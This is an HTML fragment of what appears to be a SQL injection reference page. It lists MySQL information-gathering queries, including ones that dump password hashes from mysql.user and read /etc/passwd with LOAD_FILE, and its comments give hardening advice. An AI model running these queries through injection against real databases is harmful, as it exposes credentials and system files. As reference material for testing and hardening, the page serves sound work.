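<!--
  MySQL "Information Gathering" reference table.
  The page description is filled in by the template engine from site data;
  Liquid emits it unescaped, so it is presumably expected to come only from
  the site's own data files (confirm).
  A query prefixed with "*" needs a privileged database account.
  Defensive reading: the information_schema rows only return objects the
  connected account already has privileges on, so a narrowly scoped
  application account limits what these queries can reveal.
-->
<h3 id="information-gathering">Information Gathering</h3>
<p class="pageDescription">{{site.data.injectionDescriptions.informationGathering}}</p>
<p>* Requires privileged user</p>
<!-- Header alignment is left to the stylesheet; scope ties each header to its column for assistive technology. -->
<table class="table table-striped table-hover">
  <thead>
    <tr>
      <th scope="col">Description</th>
      <th scope="col">Query</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Version</td>
      <td>SELECT @@version</td>
    </tr>
    <tr>
      <td>User</td>
      <td>SELECT user()<br>SELECT system_user()</td>
    </tr>
    <!--
      NOTE(review): only the Super_priv query carries the "*" marker, but the
      other queries against mysql.user in this table (Users, DBA Accounts,
      Password Hashes) also need SELECT on that table. Confirm whether they
      should be marked as well. Hardening: application accounts should hold
      no privileges on the mysql system schema.
    -->
    <tr>
      <td>Users</td>
      <td>SELECT user FROM mysql.user<br>* SELECT Super_priv FROM mysql.user WHERE user= 'root' LIMIT 1,1</td>
    </tr>
    <tr>
      <td>Tables</td>
      <td>SELECT table_schema, table_name FROM information_schema.tables</td>
    </tr>
    <tr>
      <td>Columns</td>
      <td>SELECT table_name, column_name FROM information_schema.columns</td>
    </tr>
    <tr>
      <td>Databases</td>
      <td>SELECT schema_name FROM information_schema.schemata</td>
    </tr>
    <tr>
      <td>Current Database Name</td>
      <td>SELECT database()</td>
    </tr>
    <!-- Square-bracketed names are placeholders to be substituted, not SQL syntax. -->
    <tr>
      <td>Query another Database</td>
      <td>USE [database_name]; SELECT database();<br>SELECT [column] FROM [database_name].[table_name]</td>
    </tr>
    <tr>
      <td>Number of Columns</td>
      <td>SELECT count(*) FROM information_schema.columns WHERE table_name = '[table_name]'</td>
    </tr>
    <tr>
      <td>DBA Accounts</td>
      <td>SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'</td>
    </tr>
    <!-- The column holding the hash differs by server version, as the trailing SQL comments in the cell state. -->
    <tr>
      <td>Password Hashes</td>
      <td>SELECT host, user, password FROM mysql.user -- (until MySQL 5.6)<br>SELECT host, user, authentication_string FROM mysql.user -- (since MySQL 5.7)</td>
    </tr>
    <tr>
      <td>Schema</td>
      <td>SELECT schema()</td>
    </tr>
    <tr>
      <td>Path to Data</td>
      <td>SELECT @@datadir</td>
    </tr>
    <!--
      LOAD_FILE needs the FILE privilege and is confined by the server's
      secure_file_priv setting. Withholding FILE from application accounts
      and restricting secure_file_priv are the relevant hardening controls.
    -->
    <tr>
      <td>Read Files</td>
      <td>* SELECT LOAD_FILE('/etc/passwd')</td>
    </tr>
  </tbody>
</table>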